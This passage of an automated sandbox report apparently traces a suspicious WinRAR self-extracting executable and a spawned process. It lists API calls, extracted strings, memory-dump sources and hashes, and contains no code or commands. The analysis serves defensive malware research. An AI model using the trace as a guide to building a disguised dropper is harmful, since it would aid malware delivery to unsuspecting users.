                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                        • API String ID: 2141747552-1753850145
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPointer$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2252061734-0
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00EBBF39
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EBBF5C
                                                                                                                          • Part of subcall function 00EB8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EBCA2C,00000000,?,00EB6CBE,?,00000008,?,00EB91E0,?,?,?), ref: 00EB8E38
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EBBF82
                                                                                                                        • _free.LIBCMT ref: 00EBBF95
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EBBFA4
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 336800556-0
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00EB91AD,00EBB188,?,00EB9813,00000001,00000364,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EB986E
                                                                                                                        • _free.LIBCMT ref: 00EB98A3
                                                                                                                        • _free.LIBCMT ref: 00EB98CA
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB98D7
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB98E0
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3170660625-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EA11CF: ResetEvent.KERNEL32(?), ref: 00EA11E1
                                                                                                                          • Part of subcall function 00EA11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00EA11F5
                                                                                                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00EA0F21
                                                                                                                        • CloseHandle.KERNEL32(?,?), ref: 00EA0F3B
                                                                                                                        • DeleteCriticalSection.KERNEL32(?), ref: 00EA0F54
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EA0F60
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EA0F6C
                                                                                                                          • Part of subcall function 00EA0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00EA1206,?), ref: 00EA0FEA
                                                                                                                          • Part of subcall function 00EA0FE4: GetLastError.KERNEL32(?), ref: 00EA0FF6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1868215902-0
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00EBC817
                                                                                                                          • Part of subcall function 00EB8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?), ref: 00EB8DE2
                                                                                                                          • Part of subcall function 00EB8DCC: GetLastError.KERNEL32(?,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?,?), ref: 00EB8DF4
                                                                                                                        • _free.LIBCMT ref: 00EBC829
                                                                                                                        • _free.LIBCMT ref: 00EBC83B
                                                                                                                        • _free.LIBCMT ref: 00EBC84D
                                                                                                                        • _free.LIBCMT ref: 00EBC85F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00EA1FE5
                                                                                                                        • _wcslen.LIBCMT ref: 00EA1FF6
                                                                                                                        • _wcslen.LIBCMT ref: 00EA2006
                                                                                                                        • _wcslen.LIBCMT ref: 00EA2014
                                                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E9B371,?,?,00000000,?,?,?), ref: 00EA202F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CompareString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3397213944-0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _swprintf
                                                                                                                        • String ID: %ls$%s: %s
                                                                                                                        • API String ID: 589789837-2259941744
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\8k1e14tjcx.exe,00000104), ref: 00EB7FAE
                                                                                                                        • _free.LIBCMT ref: 00EB8079
                                                                                                                        • _free.LIBCMT ref: 00EB8083
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                        • String ID: C:\Users\user\Desktop\8k1e14tjcx.exe
                                                                                                                        • API String ID: 2506810119-2718635268
                                                                                                                        APIs
                                                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00EB31FB
                                                                                                                        • _abort.LIBCMT ref: 00EB3306
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EncodePointer_abort
                                                                                                                        • String ID: MOC$RCC
                                                                                                                        • API String ID: 948111806-2084237596
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E97406
                                                                                                                          • Part of subcall function 00E93BBA: __EH_prolog.LIBCMT ref: 00E93BBF
                                                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00E974CD
                                                                                                                          • Part of subcall function 00E97A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E97AAB
                                                                                                                          • Part of subcall function 00E97A9C: GetLastError.KERNEL32 ref: 00E97AF1
                                                                                                                          • Part of subcall function 00E97A9C: CloseHandle.KERNEL32(?), ref: 00E97B00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                        • API String ID: 3813983858-639343689
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00EAAD98
                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00EAADAD
                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00EAADC2
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                        • String ID: ASKNEXTVOL
                                                                                                                        • API String ID: 445417207-3402441367
                                                                                                                        APIs
                                                                                                                        • DialogBoxParamW.USER32(GETPASSWORD1,0001043A,00EAB270,?,?), ref: 00EADE18
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogParam
                                                                                                                        • String ID: GETPASSWORD1$r$xz
                                                                                                                        • API String ID: 665744214-1165776382
                                                                                                                        APIs
                                                                                                                        • __fprintf_l.LIBCMT ref: 00E9D954
                                                                                                                        • _strncpy.LIBCMT ref: 00E9D99A
                                                                                                                          • Part of subcall function 00EA1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00ED1030,00000200,00E9D928,00000000,?,00000050,00ED1030), ref: 00EA1DC4
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                        • String ID: $%s$@%s
                                                                                                                        • API String ID: 562999700-834177443
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00E9AC5A,00000008,?,00000000,?,00E9D22D,?,00000000), ref: 00EA0E85
                                                                                                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00E9AC5A,00000008,?,00000000,?,00E9D22D,?,00000000), ref: 00EA0E8F
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00E9AC5A,00000008,?,00000000,?,00E9D22D,?,00000000), ref: 00EA0E9F
                                                                                                                        Strings
                                                                                                                        • Thread pool initialization failed., xrefs: 00EA0EB7
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                        • String ID: Thread pool initialization failed.
                                                                                                                        • API String ID: 3340455307-2182114853
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Malloc
                                                                                                                        • String ID: ($2$A
                                                                                                                        • API String ID: 2696272793-112831991
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                        • API String ID: 0-56093855
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E9E2E8: _swprintf.LIBCMT ref: 00E9E30E
                                                                                                                          • Part of subcall function 00E9E2E8: _strlen.LIBCMT ref: 00E9E32F
                                                                                                                          • Part of subcall function 00E9E2E8: SetDlgItemTextW.USER32(?,00ECE274,?), ref: 00E9E38F
                                                                                                                          • Part of subcall function 00E9E2E8: GetWindowRect.USER32(?,?), ref: 00E9E3C9
                                                                                                                          • Part of subcall function 00E9E2E8: GetClientRect.USER32(?,?), ref: 00E9E3D5
                                                                                                                        • GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                        • SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                        • String ID: $0
                                                                                                                        • API String ID: 2622349952-2895914132
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1036877536-0
                                                                                                                        • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                        • Instruction ID: 0e4b05bdddc38dba9d40e5462f51970e2e2581787224bcced00bc7971f808dad
                                                                                                                        • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                        • Instruction Fuzzy Hash: EFA14472A002869FEB158F28C8917EBFFE4EF51304F18516DE685BB283C2388941CB50
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00E97F69,?,?,?), ref: 00E9A3FA
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00E97F69,?), ref: 00E9A43E
                                                                                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00E97F69,?,?,?,?,?,?,?), ref: 00E9A4BF
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,00E97F69,?,?,?,?,?,?,?,?,?,?), ref: 00E9A4C6
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Create$CloseHandleTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2287278272-0
                                                                                                                        • Opcode ID: 8aade6248c81400b056001c9745f552c383395bb4355988ff6a604e51bf16af2
                                                                                                                        • Instruction ID: 8a1bce576250964b0a214ac205cb483d5bcbda3b02c208bdd63f3a2417a9ef61
                                                                                                                        • Opcode Fuzzy Hash: 8aade6248c81400b056001c9745f552c383395bb4355988ff6a604e51bf16af2
                                                                                                                        • Instruction Fuzzy Hash: 1841E1312483819ADB31DF24DC46FEEBBE4AF85304F18092DB5E1A7180D6A49A4CDB93
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00EB91E0,?,00000000,?,00000001,?,?,00000001,00EB91E0,?), ref: 00EBC9D5
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EBCA5E
                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00EB6CBE,?), ref: 00EBCA70
                                                                                                                        • __freea.LIBCMT ref: 00EBCA79
                                                                                                                          • Part of subcall function 00EB8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EBCA2C,00000000,?,00EB6CBE,?,00000008,?,00EB91E0,?,?,?), ref: 00EB8E38
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2652629310-0
                                                                                                                        • Opcode ID: 81d3f5b0160f74fb4c3775fa5ae0aca62c95f367f894dd241b66bcc95228747b
                                                                                                                        • Instruction ID: b76110d0717a13dfe47a293e86c1f0f72bc2ab02fbc31d4bed580f1713101d16
                                                                                                                        • Opcode Fuzzy Hash: 81d3f5b0160f74fb4c3775fa5ae0aca62c95f367f894dd241b66bcc95228747b
                                                                                                                        • Instruction Fuzzy Hash: 5D31AC72A0020AAFDB25CF64CC41DEF7BA5EB41310B144129F805F6250EB35DD91CBA0
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00EAA666
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EAA675
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EAA683
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00EAA691
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1035833867-0
                                                                                                                        • Opcode ID: 96ae9bf437ea276224adf09d9029b49343e8f9fbdf4e112ee806cb0df14b085a
                                                                                                                        • Instruction ID: 13ae3fa359407f476793fa484bf972dce5ece7a85df6f5efa6950409bb0f8fd9
                                                                                                                        • Opcode Fuzzy Hash: 96ae9bf437ea276224adf09d9029b49343e8f9fbdf4e112ee806cb0df14b085a
                                                                                                                        • Instruction Fuzzy Hash: 65E0EC31982721BFD2615B72BD0DB9B3F54EB55B52F054113FA05BA190DF648A08CBA1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: .lnk$d
                                                                                                                        • API String ID: 2691759472-761835416
                                                                                                                        • Opcode ID: c0a901b88e882284aec08a4e6bf6fc6b449484ae99492ccf591984d7c25844bb
                                                                                                                        • Instruction ID: 2280899fce85c582e34e055ad9256efda774226623317130a6c9bd0660a822db
                                                                                                                        • Opcode Fuzzy Hash: c0a901b88e882284aec08a4e6bf6fc6b449484ae99492ccf591984d7c25844bb
                                                                                                                        • Instruction Fuzzy Hash: 4DA196728041299ADF24DBA0DD45EFA73FC9F49304F0895A6F50AFB551EE34AB84CB60
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E975E3
                                                                                                                          • Part of subcall function 00EA05DA: _wcslen.LIBCMT ref: 00EA05E0
                                                                                                                          • Part of subcall function 00E9A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E9A598
                                                                                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E9777F
                                                                                                                          • Part of subcall function 00E9A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A501
                                                                                                                          • Part of subcall function 00E9A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A532
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 3226429890-336475711
                                                                                                                        • Opcode ID: a45f6d52f29fbcb9f9c3dfe3e40f9dfe5de658b598df4c5f341398374c2da4bf
                                                                                                                        • Instruction ID: ab25a83b437c55517fe02c10e8a83b446115740e56136465f925bb949f1ac9ad
                                                                                                                        • Opcode Fuzzy Hash: a45f6d52f29fbcb9f9c3dfe3e40f9dfe5de658b598df4c5f341398374c2da4bf
                                                                                                                        • Instruction Fuzzy Hash: D9416071901258A9EF25EB64CC59EEEB3B8EF45300F0050EAB645B6093DB745F89CB71
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: *
                                                                                                                        • API String ID: 2691759472-163128923
                                                                                                                        • Opcode ID: d6697c86140e4dac39f2411a3a4d337c5caf6ff40559d8d960ddcdc8cb57313e
                                                                                                                        • Instruction ID: c5fda44dc4a01c9f4bfcb7df254f48f73d8a4bf0a0a338b38319de8cd7e1e20f
                                                                                                                        • Opcode Fuzzy Hash: d6697c86140e4dac39f2411a3a4d337c5caf6ff40559d8d960ddcdc8cb57313e
                                                                                                                        • Instruction Fuzzy Hash: A6313922144311AADF30EE54BB026BB73E4DF94B18F14A01EF9A4B7143F7668C81B361
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: }
                                                                                                                        • API String ID: 176396367-4239843852
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E9F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E9F2E4
                                                                                                                          • Part of subcall function 00E9F2C5: GetProcAddress.KERNEL32(00ED81C8,CryptUnprotectMemory), ref: 00E9F2F4
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,00E9F33E), ref: 00E9F3D2
                                                                                                                        Strings
                                                                                                                        • CryptUnprotectMemory failed, xrefs: 00E9F3CA
                                                                                                                        • CryptProtectMemory failed, xrefs: 00E9F389
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$CurrentProcess
                                                                                                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                        • API String ID: 2190909847-396321323
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00010000,00EA1160,?,00000000,00000000), ref: 00EA1043
                                                                                                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 00EA108A
                                                                                                                          • Part of subcall function 00E96C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E96C54
                                                                                                                          • Part of subcall function 00E96DCB: _wcschr.LIBVCRUNTIME ref: 00E96E0A
                                                                                                                          • Part of subcall function 00E96DCB: _wcschr.LIBVCRUNTIME ref: 00E96E19
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                                        • String ID: CreateThread failed
                                                                                                                        • API String ID: 2706921342-3849766595
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: <9$?*<>|"
                                                                                                                        • API String ID: 2691759472-2723886458
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: Software\WinRAR SFX$
                                                                                                                        • API String ID: 176396367-3959033184
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EB97E5: GetLastError.KERNEL32(?,00ED1030,00EB4674,00ED1030,?,?,00EB3F73,00000050,?,00ED1030,00000200), ref: 00EB97E9
                                                                                                                          • Part of subcall function 00EB97E5: _free.LIBCMT ref: 00EB981C
                                                                                                                          • Part of subcall function 00EB97E5: SetLastError.KERNEL32(00000000,?,00ED1030,00000200), ref: 00EB985D
                                                                                                                          • Part of subcall function 00EB97E5: _abort.LIBCMT ref: 00EB9863
                                                                                                                        • _abort.LIBCMT ref: 00EBBB80
                                                                                                                        • _free.LIBCMT ref: 00EBBBB4
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_abort_free
                                                                                                                        • String ID: p
                                                                                                                        • API String ID: 289325740-2678736219
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Malloc
                                                                                                                        • String ID: ($Z
                                                                                                                        • API String ID: 2696272793-3316338816
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EBBF30: GetEnvironmentStringsW.KERNEL32 ref: 00EBBF39
                                                                                                                          • Part of subcall function 00EBBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EBBF5C
                                                                                                                          • Part of subcall function 00EBBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EBBF82
                                                                                                                          • Part of subcall function 00EBBF30: _free.LIBCMT ref: 00EBBF95
                                                                                                                          • Part of subcall function 00EBBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EBBFA4
                                                                                                                        • _free.LIBCMT ref: 00EB82AE
                                                                                                                        • _free.LIBCMT ref: 00EB82B5
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                        • String ID: 0"
                                                                                                                        • API String ID: 400815659-420201205
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,00EA1206,?), ref: 00EA0FEA
                                                                                                                        • GetLastError.KERNEL32(?), ref: 00EA0FF6
                                                                                                                          • Part of subcall function 00E96C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E96C54
                                                                                                                        Strings
                                                                                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00EA0FFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                        • API String ID: 1091760877-2248577382
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00E9DA55,?), ref: 00E9E2A3
                                                                                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00E9DA55,?), ref: 00E9E2B1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindHandleModuleResource
                                                                                                                        • String ID: RTL
                                                                                                                        • API String ID: 3537982541-834975271
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE467
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: U$z
                                                                                                                        • API String ID: 1269201914-4031037884
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00EAE467
                                                                                                                          • Part of subcall function 00EAE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EAE8D0
                                                                                                                          • Part of subcall function 00EAE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EAE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: U$p
                                                                                                                        • API String ID: 1269201914-1412734706
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 5[_H
                                                                                                                        • API String ID: 0-3279724263
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
